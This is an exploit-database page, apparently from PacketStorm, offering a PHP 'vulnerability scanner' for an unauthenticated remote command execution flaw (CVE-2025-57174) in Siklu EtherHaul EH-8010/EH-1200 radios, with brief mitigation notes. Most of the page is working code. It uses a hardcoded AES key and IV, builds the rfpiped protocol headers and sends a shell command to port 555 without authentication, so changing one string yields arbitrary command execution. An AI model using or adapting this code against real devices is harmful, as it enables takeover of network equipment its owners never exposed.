Share 
## https://sploitus.com/exploit?id=PACKETSTORM:214254
=============================================================================================================================================
    | # Title     : Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ceragon.com/products/siklu-by-ceragon                                                                           |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214068/ & 	CVE-2025-57174
    
    [+] Summary    : This PHP-based scanner safely detects an unauthenticated remote command execution vulnerability in Siklu EtherHaul devices by
                     sending a non-destructive encrypted probe command and validating the response.
                     The scanner does not alter device state and is suitable for large-scale assessments.
    
    [+] Impact:
    
    Successful detection confirms full unauthenticated RCE exposure.
    
    [+] Mitigation:
    
    - Restrict TCP port 555
    - Disable rfpiped service
    - Update firmware
    
    [+] POC: php poc.php 192.168.1.10
    
    <?php
    
    define('PORT', 555);
    define('HDR_LEN', 0x90);
    
    $IV0 = pack(
        'V4',
        0xEA703B82,
        0x75A9A17B,
        0x1DFC7BB9,
        0x55A24D72
    );
    
    $KEY = hex2bin(
        '89e7ffbeeb2d73f5a910fc425b1f3617' .
        '9fb95e7535a342a05d0248b119d24b82'
    );
    
    function recv_exact($sock, $len)
    {
        $data = '';
        while (strlen($data) < $len) {
            $chunk = @socket_read($sock, $len - strlen($data));
            if ($chunk === false || $chunk === '') {
                return false;
            }
            $data .= $chunk;
        }
        return $data;
    }
    
    function pad16_zero($data)
    {
        $r = strlen($data) % 16;
        return $r === 0 ? $data : $data . str_repeat("\x00", 16 - $r);
    }
    
    function hdr_checksum($hdr)
    {
        $sum = 0;
        for ($i = 0; $i < 0x0C; $i++) {
            $sum += ord($hdr[$i]);
        }
        for ($i = 0x10; $i < HDR_LEN; $i++) {
            $sum += ord($hdr[$i]);
        }
        return $sum & 0xFFFFFFFF;
    }
    
    function build_header($flag, $msg, $payload_len)
    {
        $hdr = str_repeat("\x00", HDR_LEN);
        $hdr[0] = chr($flag);
        $hdr[1] = chr($msg);
        $hdr = substr_replace($hdr, pack('V', $payload_len), 0x08, 4);
        $hdr = substr_replace($hdr, pack('V', hdr_checksum($hdr)), 0x0C, 4);
        return $hdr;
    }
    
    class RFPipeSession
    {
        public $key;
        public $send_iv;
        public $recv_iv;
    
        function __construct($key, $iv)
        {
            $this->key = $key;
            $this->send_iv = $iv;
            $this->recv_iv = $iv;
        }
    
        function enc_send($sock, $data)
        {
            $ct = openssl_encrypt(
                $data,
                'AES-256-CBC',
                $this->key,
                OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
                $this->send_iv
            );
            $this->send_iv = substr($ct, -16);
            @socket_write($sock, $ct);
        }
    
        function recv_header($sock)
        {
            $ct = recv_exact($sock, HDR_LEN);
            if ($ct === false) return false;
    
            $pt = openssl_decrypt(
                $ct,
                'AES-256-CBC',
                $this->key,
                OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
                $this->recv_iv
            );
            $this->recv_iv = substr($ct, -16);
            return $pt;
        }
    
        function dec_recv($sock, $len)
        {
            $padded = ($len + 15) & ~15;
            $ct = recv_exact($sock, $padded);
            if ($ct === false) return false;
    
            $pt = openssl_decrypt(
                $ct,
                'AES-256-CBC',
                $this->key,
                OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
                $this->recv_iv
            );
            $this->recv_iv = substr($ct, -16);
            return substr($pt, 0, $len);
        }
    }
    
    if ($argc < 2) {
        echo "Usage: php siklu_eh_scanner.php <target>\n";
        exit;
    }
    
    $target = $argv[1];
    $probe  = "echo VULN_CHECK\x00";
    
    $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if (!@socket_connect($sock, $target, PORT)) {
        echo "[!] Connection failed\n";
        exit;
    }
    
    $sess = new RFPipeSession($KEY, $IV0);
    $hdr  = build_header(0x00, 0x01, strlen($probe));
    
    $sess->enc_send($sock, $hdr);
    $sess->enc_send($sock, pad16_zero($probe));
    
    $resp_hdr = $sess->recv_header($sock);
    if ($resp_hdr === false) {
        echo "[?] No response (filtered or patched)\n";
        exit;
    }
    
    $len = unpack('V', substr($resp_hdr, 0x08, 4))[1];
    if ($len <= 0) {
        echo "[-] Not Vulnerable\n";
        exit;
    }
    
    $data = $sess->dec_recv($sock, $len);
    if ($data !== false && strpos($data, 'VULN_CHECK') !== false) {
        echo "[+] VULNERABLE: Unauthenticated RCE detected\n";
    } else {
        echo "[-] Not Vulnerable\n";
    }
    
    socket_close($sock);
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================